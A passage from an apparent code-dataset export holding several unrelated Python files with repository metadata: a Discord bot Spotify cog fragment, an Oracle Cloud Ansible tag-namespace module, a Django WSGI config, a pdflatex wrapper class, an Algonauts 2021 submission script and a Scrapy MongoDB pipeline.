"track": "\N{CLOCKWISE RIGHTWARDS AND LEFTWARDS OPEN CIRCLE ARROWS WITH CIRCLED ONE OVERLAY}",
"off": "",
}
PITCH = {
0: "C ",
1: "C♯, D♭",
2: "D",
3: "D♯, E♭",
4: "E",
5: "F",
6: "F♯, G♭",
7: "G",
8: "G♯, A♭",
9: "A",
10: "A♯, B♭",
11: "B",
"t": "A♯, B♭",
"A": "A♯, B♭",
"e": "B",
"B": "B",
}
MODE = {
0: "minor",
1: "Major",
}
VALID_RECOMMENDATIONS = {
"acousticness": lambda x: max(min(1.0, x / 100), 0.0),
"danceability": lambda x: max(min(1.0, x / 100), 0.0),
"duration_ms": lambda x: int(x),
"energy": lambda x: max(min(1.0, x / 100), 0.0),
"instrumentalness": lambda x: max(min(1.0, x / 100), 0.0),
"key": lambda x: max(min(11, x), 0),
"liveness": lambda x: max(min(1.0, x / 100), 0.0),
"loudness": lambda x: max(min(0.0, x), -60.0),
"mode": lambda x: 1 if x.lower() == "major" else 0,
"popularity": lambda x: max(min(100, x), 0),
"speechiness": lambda x: max(min(1.0, x / 100), 0.0),
"tempo": lambda x: float(x),
"time_signature": lambda x: int(x),
"valence": lambda x: max(min(1.0, x / 100), 0.0),
}
class SpotifyError(Exception):
pass
class NotPlaying(SpotifyError):
pass
class InvalidEmoji(SpotifyError):
pass
def time_convert(length: Union[int, str]) -> int:
if isinstance(length, int):
return length
match = _RE_TIME_CONVERTER.match(length)
if match is not None:
hr = int(match.group(1)) if match.group(1) else 0
mn = int(match.group(2)) if match.group(2) else 0
sec = int(match.group(3)) if match.group(3) else 0
pos = sec + (mn * 60) + (hr * 3600)
return pos
else:
try:
return int(length)
except ValueError:
return 0
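# Worked examples for time_convert (quick reference, not executed):
#   time_convert("1:23:45") == 1*3600 + 23*60 + 45 == 5025
#   time_convert("03:20")   == 3*60 + 20 == 200
#   time_convert("oops")    == 0   (regex misses and int() fails, so it falls back to 0)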
async def make_details(track: tekore.model.FullTrack, details: tekore.model.AudioFeatures) -> str:
"""
{
"duration_ms" : 255349,
"key" : 5,
"mode" : 0,
"time_signature" : 4,
"acousticness" : 0.514,
"danceability" : 0.735,
"energy" : 0.578,
"instrumentalness" : 0.0902,
"liveness" : 0.159,
"loudness" : -11.840,
"speechiness" : 0.0461,
"valence" : 0.624,
"tempo" : 98.002,
"id" : "06AKEBrKUckW0KREUWRnvT",
"uri" : "spotify:track:06AKEBrKUckW0KREUWRnvT",
"track_href" : "https://api.spotify.com/v1/tracks/06AKEBrKUckW0KREUWRnvT",
"analysis_url" : "https://api.spotify.com/v1/audio-analysis/06AKEBrKUckW0KREUWRnvT",
"type" : "audio_features"
}
"""
attrs = [
"duration_ms",
"key",
"mode",
"time_signature",
"acousticness",
"danceability",
"energy",
"instrumentalness",
"liveness",
"speechiness",
"valence",
"loudness",
"tempo",
]
ls = []
ls.append(("Explicit", track.explicit))
ls.append(("Popularity", f"[ {track.popularity} ]"))
track_num = getattr(track, "track_number", "None")
ls.append(("Track", f"[ {track_num} ]"))
for attr in attrs:
friendly_name = attr.replace("_", " ").title()
detail = getattr(details, attr)
if attr == "duration_ms":
detail = humanize_timedelta(seconds=int(detail) / 1000)
ls.append(("Duration", detail))
continue
if attr == "key":
detail = PITCH[detail]
if attr == "mode":
detail = MODE[detail]
if attr == "loudness":
detail = f"[ {detail} dB ]"
if attr == "tempo":
detail = f"[ {detail} BPM ]"
if attr == "time_signature":
detail = f"[ {detail}/4 ]"
if isinstance(detail, int):
detail = f"[ {detail} ]"
if isinstance(detail, float):
detail = f"[ {round(detail * 100)}% ]"
ls.append((friendly_name, detail))
return tabulate(ls, headers=["Detail", "Info"], tablefmt="pretty")
def _draw_play(song: tekore.model.CurrentlyPlayingContext) -> str:
"""
Courtesy of aikaterna from Audio in red and away cog
https://github.com/Cog-Creators/Red-DiscordBot/blob/V3/develop/redbot/cogs/audio/core/utilities/formatting.py#L358-L376
"""
song_start_time = datetime.datetime.utcfromtimestamp(song.timestamp / 1000)
end_time = datetime.datetime.utcfromtimestamp((song.timestamp + song.item.duration_ms) / 1000)
total_time = end_time - song_start_time
current_time = datetime.datetime.utcnow()
elapsed_time = current_time - song_start_time
sections = 12
    loc_time = round((elapsed_time / total_time) * sections)  # position within the 12 sections
bar_char = "\N{BOX DRAWINGS HEAVY HORIZONTAL}"
seek_char = "\N{RADIO BUTTON}"
play_char = "\N{BLACK RIGHT-POINTING TRIANGLE}"
msg = "\n" + play_char + " "
for i in range(sections):
if i == loc_time:
msg += seek_char
else:
msg += bar_char
msg += " `{:.7}`/`{:.7}`".format(str(elapsed_time), str(total_time))
return msg
class SearchTypes(Converter):
"""
This ensures that when using the search function we get a valid search type
"""
async def convert(self, ctx: commands.Context, argument: str) -> str:
valid_types = [
"artist",
"album",
"episode",
"playlist",
"show",
"track",
]
find = argument.lower()
if find not in valid_types:
raise BadArgument(_("{argument} is not a valid genre.").format(argument=argument))
return find
class ScopeConverter(Converter):
"""
This ensures that when using the search function we get a valid search type
"""
async def convert(self, ctx: commands.Context, argument: str) -> str:
valid_types = [
"user-read-private",
"user-top-read",
"user-read-recently-played",
"user-follow-read",
"user-library-read",
"user-read-currently-playing",
"user-read-playback-state",
"user-read-playback-position",
"playlist-read-collaborative",
"playlist-read-private",
"user-follow-modify",
"user-library-modify",
"user-modify-playback-state",
"playlist-modify-public",
"playlist-modify-private",
"ugc-image-upload",
]
find = argument.lower()
if find not in valid_types:
raise BadArgument(_("{argument} is not a valid scope.").format(argument=argument))
return find
class RecommendationsConverter(Converter):
"""
This ensures that we are using valid genres
"""
async def convert(self, ctx: commands.Context, argument: str) -> dict:
query = {}
argument = argument.replace("🧑🎨", ":artist:")
# because discord will replace this in URI's automatically 🙄
rec_str = r"|".join(i for i in VALID_RECOMMENDATIONS.keys())
find_rec = re.compile(fr"({rec_str})\W(.+)", flags=re.I)
if not ctx.cog.GENRES:
try:
ctx.cog.GENRES = await ctx.cog._spotify_client.recommendation_genre_seeds()
except Exception:
raise BadArgument(
_(
"The bot owner needs to set their Spotify credentials "
"before this command can be used."
" See `{prefix}spotify set creds` for more details."
).format(prefix=ctx.clean_prefix)
)
genre_str = r"|".join(i for i in ctx.cog.GENRES)
find_genre = re.compile(fr"\b({genre_str})\b", flags=re.I)
find_extra = find_rec.finditer(argument)
genres = list(find_genre.findall(argument))
song_data = SPOTIFY_RE.finditer(argument)
tracks: List[str] = []
artists: List[str] = []
if song_data:
for match in song_data:
if match.group(2) == "track":
tracks.append(match.group(3))
if match.group(2) == "artist":
artists.append(match.group(3))
query = {
"artist_ids": artists if artists else None,
"genres": genres if genres else None,
"track_ids": tracks if tracks else None,
"limit": 100,
"market": "from_token",
}
for match in find_extra:
try:
num_or_str = match.group(2).isdigit()
if num_or_str:
result = VALID_RECOMMENDATIONS[match.group(1)](int(match.group(2)))
else:
result = VALID_RECOMMENDATIONS[match.group(1)](match.group(2))
query[f"target_{match.group(1)}"] = result
except Exception:
log.exception("cannot match")
continue
if not any([query[k] for k in ["artist_ids", "genres", "track_ids"]]):
raise BadArgument(
_("You must provide either an artist or track seed or a genre for this to work")
)
return query
class SpotifyURIConverter(Converter):
"""
Ensures that the argument is a valid spotify URL or URI
"""
async def convert(self, ctx: commands.Context, argument: str) -> re.Match:
match = SPOTIFY_RE.match(argument)
if not match:
raise BadArgument(
_("{argument} is not a valid Spotify URL or URI.").format(argument=argument)
)
return match
| 32.241486
| 123
| 0.565489
|
a2e49ad630e3adb49acfa1c804959f1ec354c34b
| 15,712
|
py
|
Python
|
plugins/modules/oci_identity_tag_namespace.py
|
slmjy/oci-ansible-collection
|
349c91e2868bf4706a6e3d6fb3b47fc622bfe11b
|
[
"Apache-2.0"
] | 108
|
2020-05-19T20:46:10.000Z
|
2022-03-25T14:10:01.000Z
|
plugins/modules/oci_identity_tag_namespace.py
|
slmjy/oci-ansible-collection
|
349c91e2868bf4706a6e3d6fb3b47fc622bfe11b
|
[
"Apache-2.0"
] | 90
|
2020-06-14T22:07:11.000Z
|
2022-03-07T05:40:29.000Z
|
plugins/modules/oci_identity_tag_namespace.py
|
slmjy/oci-ansible-collection
|
349c91e2868bf4706a6e3d6fb3b47fc622bfe11b
|
[
"Apache-2.0"
] | 42
|
2020-08-30T23:09:12.000Z
|
2022-03-25T16:58:01.000Z
|
#!/usr/bin/python
# Copyright (c) 2020, 2021 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_identity_tag_namespace
short_description: Manage a TagNamespace resource in Oracle Cloud Infrastructure
description:
- This module allows the user to create, update and delete a TagNamespace resource in Oracle Cloud Infrastructure
- For I(state=present), creates a new tag namespace in the specified compartment.
- You must specify the compartment ID in the request object (remember that the tenancy is simply the root
compartment).
- "You must also specify a *name* for the namespace, which must be unique across all namespaces in your tenancy
      and cannot be changed. The name can contain any ASCII character except the space or period (.).
Names are case insensitive. That means, for example, \\"myNamespace\\" and \\"mynamespace\\" are not allowed
in the same tenancy. Once you created a namespace, you cannot change the name.
If you specify a name that's already in use in the tenancy, a 409 error is returned."
- "You must also specify a *description* for the namespace.
It does not have to be unique, and you can change it with
L(UpdateTagNamespace,https://docs.cloud.oracle.com/en-us/iaas/api/#/en/identity/latest/TagNamespace/UpdateTagNamespace)."
- "This resource has the following action operations in the M(oracle.oci.oci_identity_tag_namespace_actions) module: cascade_delete, change_compartment."
version_added: "2.9.0"
author: Oracle (@oracle)
options:
compartment_id:
description:
- The OCID of the tenancy containing the tag namespace.
- Required for create using I(state=present).
- Required for update when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
- Required for delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
name:
description:
- The name you assign to the tag namespace during creation. It must be unique across all tag namespaces in the tenancy and cannot be changed.
- Required for create using I(state=present).
- Required for update, delete when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is set.
type: str
description:
description:
- The description you assign to the tag namespace during creation.
- Required for create using I(state=present).
- This parameter is updatable.
type: str
freeform_tags:
description:
- Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Department\\": \\"Finance\\"}`"
- This parameter is updatable.
type: dict
defined_tags:
description:
- Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
- "Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
- This parameter is updatable.
type: dict
tag_namespace_id:
description:
- The OCID of the tag namespace.
- Required for update using I(state=present) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
- Required for delete using I(state=absent) when environment variable C(OCI_USE_NAME_AS_IDENTIFIER) is not set.
type: str
aliases: ["id"]
is_retired:
description:
- Whether the tag namespace is retired.
See L(Retiring Key Definitions and Namespace Definitions,https://docs.cloud.oracle.com/Content/Identity/Concepts/taggingoverview.htm#Retiring).
- This parameter is updatable.
type: bool
state:
description:
- The state of the TagNamespace.
- Use I(state=present) to create or update a TagNamespace.
- Use I(state=absent) to delete a TagNamespace.
type: str
required: false
default: 'present'
choices: ["present", "absent"]
extends_documentation_fragment: [ oracle.oci.oracle, oracle.oci.oracle_creatable_resource, oracle.oci.oracle_wait_options ]
"""
EXAMPLES = """
- name: Create tag_namespace
oci_identity_tag_namespace:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name: name_example
description: description_example
# optional
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
- name: Update tag_namespace
oci_identity_tag_namespace:
# required
tag_namespace_id: "ocid1.tagnamespace.oc1..xxxxxxEXAMPLExxxxxx"
# optional
description: description_example
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
is_retired: true
- name: Update tag_namespace using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_identity_tag_namespace:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name: name_example
# optional
description: description_example
freeform_tags: {'Department': 'Finance'}
defined_tags: {'Operations': {'CostCenter': 'US'}}
is_retired: true
- name: Delete tag_namespace
oci_identity_tag_namespace:
# required
tag_namespace_id: "ocid1.tagnamespace.oc1..xxxxxxEXAMPLExxxxxx"
state: absent
- name: Delete tag_namespace using name (when environment variable OCI_USE_NAME_AS_IDENTIFIER is set)
oci_identity_tag_namespace:
# required
compartment_id: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name: name_example
state: absent
"""
RETURN = """
tag_namespace:
description:
- Details of the TagNamespace resource acted upon by the current operation
returned: on success
type: complex
contains:
id:
description:
- The OCID of the tag namespace.
returned: on success
type: str
sample: "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx"
compartment_id:
description:
- The OCID of the compartment that contains the tag namespace.
returned: on success
type: str
sample: "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx"
name:
description:
- The name of the tag namespace. It must be unique across all tag namespaces in the tenancy and cannot be changed.
returned: on success
type: str
sample: name_example
description:
description:
- The description you assign to the tag namespace.
returned: on success
type: str
sample: description_example
freeform_tags:
description:
- "Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Department\\": \\"Finance\\"}`"
returned: on success
type: dict
sample: {'Department': 'Finance'}
defined_tags:
description:
- "Defined tags for this resource. Each key is predefined and scoped to a namespace.
For more information, see L(Resource Tags,https://docs.cloud.oracle.com/Content/General/Concepts/resourcetags.htm).
Example: `{\\"Operations\\": {\\"CostCenter\\": \\"42\\"}}`"
returned: on success
type: dict
sample: {'Operations': {'CostCenter': 'US'}}
is_retired:
description:
- Whether the tag namespace is retired.
See L(Retiring Key Definitions and Namespace
Definitions,https://docs.cloud.oracle.com/Content/Identity/Concepts/taggingoverview.htm#Retiring).
returned: on success
type: bool
sample: true
lifecycle_state:
description:
- The tagnamespace's current state. After creating a tagnamespace, make sure its `lifecycleState` is ACTIVE before using it. After retiring a
tagnamespace, make sure its `lifecycleState` is INACTIVE before using it.
returned: on success
type: str
sample: ACTIVE
time_created:
description:
- "Date and time the tagNamespace was created, in the format defined by RFC3339.
Example: `2016-08-25T21:10:29.600Z`"
returned: on success
type: str
sample: "2013-10-20T19:20:30+01:00"
sample: {
"id": "ocid1.resource.oc1..xxxxxxEXAMPLExxxxxx",
"compartment_id": "ocid1.compartment.oc1..xxxxxxEXAMPLExxxxxx",
"name": "name_example",
"description": "description_example",
"freeform_tags": {'Department': 'Finance'},
"defined_tags": {'Operations': {'CostCenter': 'US'}},
"is_retired": true,
"lifecycle_state": "ACTIVE",
"time_created": "2013-10-20T19:20:30+01:00"
}
"""
from ansible.module_utils.basic import AnsibleModule
from ansible_collections.oracle.oci.plugins.module_utils import (
oci_common_utils,
oci_wait_utils,
)
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceHelperBase,
get_custom_class,
)
try:
from oci.identity import IdentityClient
from oci.identity.models import CreateTagNamespaceDetails
from oci.identity.models import UpdateTagNamespaceDetails
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class TagNamespaceHelperGen(OCIResourceHelperBase):
"""Supported operations: create, update, get, list and delete"""
def get_module_resource_id_param(self):
return "tag_namespace_id"
def get_module_resource_id(self):
return self.module.params.get("tag_namespace_id")
def get_get_fn(self):
return self.client.get_tag_namespace
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_tag_namespace,
tag_namespace_id=self.module.params.get("tag_namespace_id"),
)
def get_required_kwargs_for_list(self):
required_list_method_params = [
"compartment_id",
]
return dict(
(param, self.module.params[param]) for param in required_list_method_params
)
def get_optional_kwargs_for_list(self):
return dict()
def list_resources(self):
required_kwargs = self.get_required_kwargs_for_list()
optional_kwargs = self.get_optional_kwargs_for_list()
kwargs = oci_common_utils.merge_dicts(required_kwargs, optional_kwargs)
return oci_common_utils.list_all_resources(
self.client.list_tag_namespaces, **kwargs
)
def get_create_model_class(self):
return CreateTagNamespaceDetails
def create_resource(self):
create_details = self.get_create_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.create_tag_namespace,
call_fn_args=(),
call_fn_kwargs=dict(create_tag_namespace_details=create_details,),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.CREATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.CREATE_OPERATION_KEY,
),
)
def get_update_model_class(self):
return UpdateTagNamespaceDetails
def update_resource(self):
update_details = self.get_update_model()
return oci_wait_utils.call_and_wait(
call_fn=self.client.update_tag_namespace,
call_fn_args=(),
call_fn_kwargs=dict(
tag_namespace_id=self.module.params.get("tag_namespace_id"),
update_tag_namespace_details=update_details,
),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.UPDATE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.UPDATE_OPERATION_KEY,
),
)
def delete_resource(self):
return oci_wait_utils.call_and_wait(
call_fn=self.client.delete_tag_namespace,
call_fn_args=(),
call_fn_kwargs=dict(
tag_namespace_id=self.module.params.get("tag_namespace_id"),
),
waiter_type=oci_wait_utils.LIFECYCLE_STATE_WAITER_KEY,
operation=oci_common_utils.DELETE_OPERATION_KEY,
waiter_client=self.get_waiter_client(),
resource_helper=self,
wait_for_states=self.get_wait_for_states_for_operation(
oci_common_utils.DELETE_OPERATION_KEY,
),
)
TagNamespaceHelperCustom = get_custom_class("TagNamespaceHelperCustom")
class ResourceHelper(TagNamespaceHelperCustom, TagNamespaceHelperGen):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec(
supports_create=True, supports_wait=True
)
module_args.update(
dict(
compartment_id=dict(type="str"),
name=dict(type="str"),
description=dict(type="str"),
freeform_tags=dict(type="dict"),
defined_tags=dict(type="dict"),
tag_namespace_id=dict(aliases=["id"], type="str"),
is_retired=dict(type="bool"),
state=dict(type="str", default="present", choices=["present", "absent"]),
)
)
module = AnsibleModule(argument_spec=module_args, supports_check_mode=True)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_helper = ResourceHelper(
module=module,
resource_type="tag_namespace",
service_client_class=IdentityClient,
namespace="identity",
)
result = dict(changed=False)
if resource_helper.is_delete_using_name():
result = resource_helper.delete_using_name()
elif resource_helper.is_delete():
result = resource_helper.delete()
elif resource_helper.is_update_using_name():
result = resource_helper.update_using_name()
elif resource_helper.is_update():
result = resource_helper.update()
elif resource_helper.is_create():
result = resource_helper.create()
module.exit_json(**result)
if __name__ == "__main__":
main()
| 39.28
| 157
| 0.663442
|
c18d141d8a8b8f636ae08f01330c3d8b13190b09
| 420
|
py
|
Python
|
list/wsgi.py
|
SkillSmart/ConferenceManagementSystem
|
43af08260f321d1d506755da5c1b6ce1cf95fc42
|
[
"MIT"
] | null | null | null |
list/wsgi.py
|
SkillSmart/ConferenceManagementSystem
|
43af08260f321d1d506755da5c1b6ce1cf95fc42
|
[
"MIT"
] | null | null | null |
list/wsgi.py
|
SkillSmart/ConferenceManagementSystem
|
43af08260f321d1d506755da5c1b6ce1cf95fc42
|
[
"MIT"
] | null | null | null |
"""
WSGI config for CompetitionManagement project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "CompetitionManagement.settings")
application = get_wsgi_application()
| 24.705882
| 81
| 0.8
|
f3d36e5f05966d0164b842fcbad2c234bfaf647f
| 5,312
|
py
|
Python
|
.venv/lib/python3.6/site-packages/pdflatex/pdflatex.py
|
rguillon/mmrpg
|
94f06b8bb13d4a94caeed247d7ceb1675b785148
|
[
"MIT"
] | 3
|
2021-04-06T18:35:29.000Z
|
2021-05-17T21:35:46.000Z
|
venv/Lib/site-packages/pdflatex/pdflatex.py
|
l-Il/py-LaTeX
|
bd9dc79820fd569fce437f2316e73f40527adcdd
|
[
"MIT"
] | null | null | null |
venv/Lib/site-packages/pdflatex/pdflatex.py
|
l-Il/py-LaTeX
|
bd9dc79820fd569fce437f2316e73f40527adcdd
|
[
"MIT"
] | null | null | null |
import os
import shutil
import tempfile
import subprocess
from subprocess import PIPE
MODE_BATCH = 0
MODE_NON_STOP = 1
MODE_SCROLL = 2
MODE_ERROR_STOP = 3
INTERACTION_MODES = ['batchmode', 'nonstopmode', 'scrollmode', 'errorstopmode']
JINJA2_ENV = {'block_start_string': r'\BLOCK{',
              'block_end_string': '}',
              'variable_start_string': r'\VAR{',
              'variable_end_string': '}',
              'comment_start_string': r'\#{',
              'comment_end_string': '}',
              'line_statement_prefix': '%%',
              'line_comment_prefix': '%#',
              'trim_blocks': True,
              'autoescape': False}
class PDFLaTeX:
def __init__(self, latex_src, job_name: str):
self.latex = latex_src
self.job_name = job_name
self.interaction_mode = INTERACTION_MODES[MODE_BATCH]
self.dir = None
self.pdf_filename = None
self.params = dict()
self.pdf = None
self.log = None
@classmethod
def from_texfile(cls, filename):
prefix = os.path.basename(filename)
prefix = os.path.splitext(prefix)[0]
with open(filename, 'rb') as f:
return cls.from_binarystring(f.read(), prefix)
@classmethod
def from_binarystring(cls, binstr: str, jobname: str):
return cls(binstr, jobname)
@classmethod
def from_jinja_template(cls, jinja2_template, jobname: str = None, **render_kwargs):
tex_src = jinja2_template.render(**render_kwargs)
fn = jinja2_template.filename
if fn is None:
fn = jobname
if not fn:
raise ValueError("PDFLaTeX: if jinja template does not have attribute 'filename' set, "
"'jobname' must be provided")
return cls(tex_src, fn)
def create_pdf(self, keep_pdf_file: bool = False, keep_log_file: bool = False, env: dict = None):
if self.interaction_mode is not None:
            self.add_args({'-interaction': self.interaction_mode})  # pdflatex's CLI flag is -interaction=<mode>
dir = self.params.get('-output-directory')
filename = self.params.get('-jobname')
if filename is None:
filename = self.job_name
if dir is None:
dir = ""
with tempfile.TemporaryDirectory() as td:
self.set_output_directory(td)
self.set_jobname('file')
args = self.get_run_args()
fp = subprocess.run(args, input=self.latex, env=env, timeout=15, stdout=PIPE, stderr=PIPE)
with open(os.path.join(td, 'file.pdf'), 'rb') as f:
self.pdf = f.read()
with open(os.path.join(td, 'file.log'), 'rb') as f:
self.log = f.read()
if keep_log_file:
shutil.move(os.path.join(td, 'file.log'), os.path.join(dir, filename + '.log'))
if keep_pdf_file:
shutil.move(os.path.join(td, 'file.pdf'), os.path.join(dir, filename + '.pdf'))
return self.pdf, self.log, fp
def get_run_args(self):
a = [k+('='+v if v is not None else '') for k, v in self.params.items()]
a.insert(0, 'pdflatex')
return a
def add_args(self, params: dict):
for k in params:
self.params[k] = params[k]
def del_args(self, params):
if isinstance(params, str):
params = [params]
if isinstance(params, dict) or isinstance(params, list):
for k in params:
if k in self.params.keys():
del self.params[k]
else:
raise ValueError('PDFLaTeX: del_cmd_params: parameter must be str, dict or list.')
def set_output_directory(self, dir: str = None):
self.generic_param_set('-output-directory', dir)
def set_jobname(self, jobname: str = None):
self.generic_param_set('-jobname', jobname)
def set_output_format(self, fmt: str = None):
if fmt and fmt not in ['pdf', 'dvi']:
raise ValueError("PDFLaTeX: Format must be either 'pdf' or 'dvi'.")
        self.generic_param_set('-output-format', fmt)
def generic_param_set(self, param_name, value):
if value is None:
if param_name in self.params.keys():
del self.params[param_name]
else:
self.params[param_name] = value
def set_pdf_filename(self, pdf_filename: str = None):
self.set_jobname(pdf_filename)
def set_batchmode(self, on: bool = True):
self.interaction_mode = INTERACTION_MODES[MODE_BATCH] if on else None
def set_nonstopmode(self, on: bool =True):
self.interaction_mode = INTERACTION_MODES[MODE_NON_STOP] if on else None
def set_scrollmode(self, on: bool = True):
self.interaction_mode = INTERACTION_MODES[MODE_SCROLL] if on else None
def set_errorstopmode(self, on: bool = True):
self.interaction_mode = INTERACTION_MODES[MODE_ERROR_STOP] if on else None
def set_interaction_mode(self, mode: int = None):
if mode is None:
self.interaction_mode = None
elif 0 <= mode <= 3:
self.interaction_mode = INTERACTION_MODES[mode]
else:
raise ValueError('PDFLaTeX: Invalid interaction mode!')
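# A minimal hypothetical usage sketch (assumes a TeX distribution with pdflatex
# on PATH and a local doc.tex; names are illustrative):
if __name__ == '__main__':
    pdfl = PDFLaTeX.from_texfile('doc.tex')
    pdf, log, completed = pdfl.create_pdf(keep_pdf_file=True, keep_log_file=True)
    print('pdflatex exited with code', completed.returncode)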
| 36.136054
| 103
| 0.591679
|
dda739530ece0c73edfe5bfd7d7ac8033097ad13
| 2,098
|
py
|
Python
|
prepare_submission.py
|
zivadinac/Algonauts2021_devkit
|
73fc6cda1903f73682ecad9245808e7b2750a9cc
|
[
"MIT"
] | 35
|
2021-05-01T02:58:03.000Z
|
2021-12-27T15:13:17.000Z
|
prepare_submission.py
|
antjak/Algonauts2021_devkit
|
aa5a677881c3d75b671065c683f63e0fad81bcdf
|
[
"MIT"
] | 2
|
2021-06-05T17:34:29.000Z
|
2021-06-22T20:36:19.000Z
|
prepare_submission.py
|
antjak/Algonauts2021_devkit
|
aa5a677881c3d75b671065c683f63e0fad81bcdf
|
[
"MIT"
] | 21
|
2021-05-06T04:59:09.000Z
|
2021-10-12T21:52:09.000Z
|
import numpy as np
import os
import glob
import random
import argparse
import itertools
import nibabel as nib
from nilearn import plotting
from tqdm import tqdm
from sklearn.cross_decomposition import PLSRegression
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import Ridge
from sklearn.preprocessing import StandardScaler
import torch
import time
import pickle
import zipfile
from utils.helper import save_dict,load_dict
def main():
parser = argparse.ArgumentParser(description='Prepares submission for Algonauts 2021')
parser.add_argument('-rd','--result_dir', help='contains predicted fMRI activity',default = './results/alexnet_devkit/layer_5', type=str)
parser.add_argument('-t','--track', help='mini_track for all ROIs, full_track for whole brain (WB)', default = 'mini_track', type=str)
args = vars(parser.parse_args())
track = args['track']
result_dir = args['result_dir']
if track == 'full_track':
ROIs = ['WB']
else:
ROIs = ['LOC','FFA','STS','EBA','PPA','V1','V2','V3','V4']
num_subs = 10
subs=[]
for s in range(num_subs):
subs.append('sub'+str(s+1).zfill(2))
results = {}
for ROI in ROIs:
ROI_results = {}
for sub in subs:
ROI_result_file = os.path.join(result_dir,track,sub,ROI+"_test.npy")
print("Result file path: ", ROI_result_file)
if not os.path.exists(ROI_result_file):
print("---------Warning : submission not ready ----------")
print("Result not found for ",sub, " and ROI: ",ROI)
print("Please check if the directory is correct or generate predicted data for ROI: ",ROI , " in subject: ", sub)
return
ROI_result = np.load(ROI_result_file)
ROI_results[sub] = ROI_result
results[ROI] = ROI_results
save_dict(results,track+".pkl")
zipped_results = zipfile.ZipFile(track+".zip", 'w')
zipped_results.write(track+".pkl")
zipped_results.close()
if __name__ == "__main__":
main()
| 33.301587
| 141
| 0.660153
|
6a3dbad2b90fea5a871e0ce14f80cb557307e73b
| 710
|
py
|
Python
|
scrape/pipelines.py
|
GGG1235/scrape
|
9454d3fc9939cf753a25af6dcfcbae80f2ab82bb
|
[
"MIT"
] | 1
|
2019-04-24T00:39:28.000Z
|
2019-04-24T00:39:28.000Z
|
scrape/pipelines.py
|
GGG1235/scrape
|
9454d3fc9939cf753a25af6dcfcbae80f2ab82bb
|
[
"MIT"
] | null | null | null |
scrape/pipelines.py
|
GGG1235/scrape
|
9454d3fc9939cf753a25af6dcfcbae80f2ab82bb
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
import pymongo
from scrape.settings import mongo_host, mongo_port, \
mongo_user, mongo_passwd, \
mongo_db_name, mongo_db_collection
class ScrapePipeline(object):
def __init__(self):
client = pymongo.MongoClient("mongodb://%s:%s@%s:%d/admin" % (mongo_user, mongo_passwd, mongo_host, mongo_port))
db = client[mongo_db_name]
self.post = db[mongo_db_collection]
def process_item(self, item, spider):
data = dict(item)
        self.post.insert_one(data)  # insert() was removed in PyMongo; insert_one() is the supported call
return item
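# The settings imported above are assumed to be plain module-level constants;
# hypothetical scrape/settings.py values for illustration:
#   mongo_host = "localhost"
#   mongo_port = 27017
#   mongo_user = "scraper"
#   mongo_passwd = "secret"
#   mongo_db_name = "scrape"
#   mongo_db_collection = "items"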
| 29.583333
| 120
| 0.692958
|
810aafb69459de120675e50ea2f995e957e9c1c3
| 973
|
py
|
Python
|
static/models/demos/RandomForest/train.py
|
jhuang-2021/Auto-build-machine-learning-platorm
|
37597a407e02b1fe2ed93ace78785b4e386aec58
|
[
"MIT"
] | null | null | null |
static/models/demos/RandomForest/train.py
|
jhuang-2021/Auto-build-machine-learning-platorm
|
37597a407e02b1fe2ed93ace78785b4e386aec58
|
[
"MIT"
] | null | null | null |
static/models/demos/RandomForest/train.py
|
jhuang-2021/Auto-build-machine-learning-platorm
|
